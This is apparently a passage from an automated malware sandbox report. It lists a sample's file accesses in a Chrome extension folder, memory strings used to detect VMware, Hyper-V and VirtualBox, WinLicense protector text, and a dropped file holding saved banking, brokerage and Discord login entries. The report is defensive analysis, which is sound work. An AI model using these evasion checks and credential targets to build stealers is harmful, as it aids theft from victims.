Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.0000000001634000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: KKEBKJJD.0.dr Binary or memory string: global block list test formVMware20,11696487552
Source: KKEBKJJD.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: vmci.sys
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: KKEBKJJD.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: vmware
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: explortu.exe, explortu.exe, 0000000B.00000002.2486095607.0000000000411000.00000040.00000001.01000000.0000000D.sdmp, explortu.exe, 0000000F.00000002.2703298636.0000000000411000.00000040.00000001.01000000.0000000D.sdmp, explortu.exe, 00000011.00000002.3310914356.0000000000411000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: KKEBKJJD.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: KKEBKJJD.0.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.6.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: KKEBKJJD.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.6.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: KKEBKJJD.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: KKEBKJJD.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 3eb62d09c2.exe, 0000000D.00000002.2515715104.0000000001CF5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware_O
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr Binary or memory string: \driver\vmci,\driver\pci
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000B7C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.000000000106C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ~VirtualMachineTypes
Source: KKEBKJJD.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000B7C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.000000000106C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: KKEBKJJD.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000B7C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.000000000106C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: KKEBKJJD.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: KKEBKJJD.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: KKEBKJJDGH.exe, 00000008.00000002.2439124494.0000000000441000.00000040.00000001.01000000.00000009.sdmp, explortu.exe, 0000000A.00000002.3419613531.0000000000411000.00000040.00000001.01000000.0000000D.sdmp, explortu.exe, 0000000B.00000002.2486095607.0000000000411000.00000040.00000001.01000000.0000000D.sdmp, explortu.exe, 0000000F.00000002.2703298636.0000000000411000.00000040.00000001.01000000.0000000D.sdmp, explortu.exe, 00000011.00000002.3310914356.0000000000411000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: KKEBKJJD.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: KKEBKJJD.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.6.dr Binary or memory string: VMware
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: KKEBKJJD.0.dr Binary or memory string: discord.comVMware20,11696487552f
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: KKEBKJJD.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: KKEBKJJD.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000166B000.00000004.00000020.00020000.00000000.sdmp, explortu.exe, 0000000A.00000002.3430361490.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, explortu.exe, 0000000A.00000002.3430361490.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2515715104.0000000001D1C000.00000004.00000020.00020000.00000000.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2515715104.0000000001D4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: KKEBKJJD.0.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
